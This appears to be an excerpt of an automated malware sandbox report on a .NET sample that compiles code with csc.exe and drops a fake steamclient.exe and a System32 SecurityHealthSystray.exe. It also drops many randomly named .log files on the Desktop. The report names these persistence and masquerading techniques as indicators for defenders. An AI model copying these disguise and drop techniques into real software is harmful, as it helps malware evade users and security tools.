                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: qNdO4D18CF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: qNdO4D18CF.exeStatic file information: File size 3012834 > 1048576
                    Source: qNdO4D18CF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.pdb source: qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: qNdO4D18CF.exe, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: steamclient.exe.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.cmdline"
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.cmdline"Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeCode function: 0_2_00007FFD9B8854CA push ss; retf 0_2_00007FFD9B8854CD
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeCode function: 0_2_00007FFD9BC40B5C push esp; ret 0_2_00007FFD9BC40EDA
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeCode function: 0_2_00007FFD9BC4304C push edi; iretd 0_2_00007FFD9BC43092
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeCode function: 0_2_00007FFD9BC4300C push esp; iretd 0_2_00007FFD9BC4304A
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeCode function: 0_2_00007FFD9BC409B5 push edx; ret 0_2_00007FFD9BC409CA
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeCode function: 0_2_00007FFD9BC409CC push ebx; ret 0_2_00007FFD9BC40B5A
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeCode function: 0_2_00007FFD9BC40979 push eax; ret 0_2_00007FFD9BC4098A
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeCode function: 42_2_00007FFD9B8954CA push ss; retf 42_2_00007FFD9B8954CD
                    Source: C:\Program Files (x86)\Steam\steamclient.exeCode function: 43_2_00007FFD9B8A54CA push ss; retf 43_2_00007FFD9B8A54CD
                    Source: C:\Program Files (x86)\Steam\steamclient.exeCode function: 47_2_00007FFD9B8AACB1 push 8B481274h; iretd 47_2_00007FFD9B8AACB6
                    Source: C:\Program Files (x86)\Steam\steamclient.exeCode function: 47_2_00007FFD9B8854CA push ss; retf 47_2_00007FFD9B8854CD

                    Persistence and Installation Behavior

                    barindex
                    Infects executable files (exe, dll, sys, html)
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\GpTgJexz.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\cRJFZrfS.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\qEBmAmuq.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\PGiZSoip.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\HWSrgsLR.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\ifdmuvPD.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\HiqIapca.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\YKeEIjtU.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\ppsaukgn.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\aUovvDkq.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\gFDeeVNW.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\RKwhQDGz.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\sOBLQjau.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\XXkOusIo.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\rreJQTki.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\fIcWIVzb.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\VxjNZniX.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\OQPyFqpt.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\VrbgQkMX.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\cpPftzHM.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\UAZgkvhu.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\LYhyhmcT.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\hcheWwWA.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\EhArHZqU.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\qcHMUuVk.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\zJmzvlwN.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\mYLVFIfJ.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\eqUeBrnj.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\Gumzpbgc.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\GeNRoyLy.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\kqnUARmv.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\IaBrEuiC.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\qOBMMFgD.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\aSHMiLLR.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\yxHkJcLm.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\KMIinpLK.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\YGOFIxBr.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\ITtzBsaM.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\zplKRyKf.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\RjAOsfOs.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\lHqLDiMI.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\VHHMJZBT.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\rThRxFce.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\lsLKjvRr.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\BdpSDMGd.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\IsFPfNCu.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\yvDYLPoQ.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\sFNjAptf.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\epactCHB.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\CufHpEgE.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\FsrYoeiE.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\aEhUzjWJ.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\vhVAXQlb.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\vpESBzMh.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\PPFZCaBl.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\TbmXCvgb.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\SzxHEkUn.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\CYASrcKR.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\JxaHDTDN.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\IYriOWqO.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\CqvSLBwK.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\PWNGLdXl.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\nDreGkIL.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\NWAOYYym.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\DfbAZvLY.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\KJWyVjBG.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\zdbaQHhe.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\BwVbAMfc.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\HLSRUZZF.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\VwwfTkqf.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\asCFMbmi.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\kWtSUqip.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\BuRPCyHG.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\paSjLIrf.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\ipiVsaGZ.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\ZHGMdjIP.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\IRjpMTiY.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\DmprTJmg.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\jEEdizHN.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\ggiwcdaV.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\nYgAqZmk.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\rRaDvjLz.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\mHEDqnlH.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\fhkMXHMd.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\XsgfYcsu.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\dCQWQdrl.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\QLzxKisH.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\rLAuGYci.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\EFxianyZ.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\BzfkqkWQ.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\PEYPdPrA.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\NnHgmtso.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\iPDDuStZ.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\NoRyKQDH.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\MeZIvNrs.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\GbyyMOOB.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\kWYnjZbO.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Program Files (x86)\Steam\steamclient.exeJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\sphCHAEj.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\iiUfyMfQ.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\QvOHgixC.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\VxBoFvwp.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\lQNLnUfF.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\htowkSQD.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\mXotVngM.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\PXvpYVwJ.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\sIbCbYqd.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\TxYPZkji.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\LforkokJ.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\tyOaygFf.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\MHUibFPy.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\KRGQASbM.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\UUoNBnsb.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\KkdqwYhV.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\bhuvEsaX.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\fQXwQazI.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\bzdouunp.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\kixEeWsX.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\AFZZLiTQ.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\ffUEpXBW.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\uENiETnW.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\dpMkGxhC.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\rzTkgNRx.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\oOnUZAGE.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\YwOfwePf.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\tEVbjhhz.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\yzXsqMXs.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\WucwbvLj.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\MlipEPMs.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\BCBhhiiL.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\VsDGsRfn.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\THYplDVu.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\NtxFrmGq.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\KgJXRbxs.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\sYBlcCMG.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\vvDaHluY.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\HSbycbvE.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\CpOixJXm.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\jUVbmMDs.logJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\UUoNBnsb.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\KgJXRbxs.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\BCBhhiiL.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\rThRxFce.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\ZHGMdjIP.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\GpTgJexz.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\nYgAqZmk.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\dpMkGxhC.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\NnHgmtso.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\BuRPCyHG.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\tyOaygFf.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\AFZZLiTQ.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\yvDYLPoQ.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\YKeEIjtU.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\NWAOYYym.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\FsrYoeiE.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\uENiETnW.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\kWtSUqip.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\lsLKjvRr.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\aEhUzjWJ.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\IsFPfNCu.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\zJmzvlwN.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\paSjLIrf.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\RjAOsfOs.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\vpESBzMh.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\aSHMiLLR.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\ppsaukgn.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\NtxFrmGq.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\vhVAXQlb.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\VwwfTkqf.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\rreJQTki.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\HSbycbvE.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\OQPyFqpt.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\ifdmuvPD.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\vvDaHluY.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\sFNjAptf.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\GbyyMOOB.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\VxjNZniX.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\jUVbmMDs.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\PWNGLdXl.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\MlipEPMs.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\kqnUARmv.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\epactCHB.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\VHHMJZBT.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\CufHpEgE.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\TbmXCvgb.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\aUovvDkq.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\iPDDuStZ.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\IRjpMTiY.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\XsgfYcsu.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\eqUeBrnj.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\LYhyhmcT.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\CpOixJXm.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\kixEeWsX.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\bzdouunp.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\QLzxKisH.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\HiqIapca.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\yzXsqMXs.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\fhkMXHMd.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\DmprTJmg.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\tEVbjhhz.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\dCQWQdrl.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\KkdqwYhV.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\sYBlcCMG.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\ipiVsaGZ.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\YGOFIxBr.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\PXvpYVwJ.logJump to dropped file
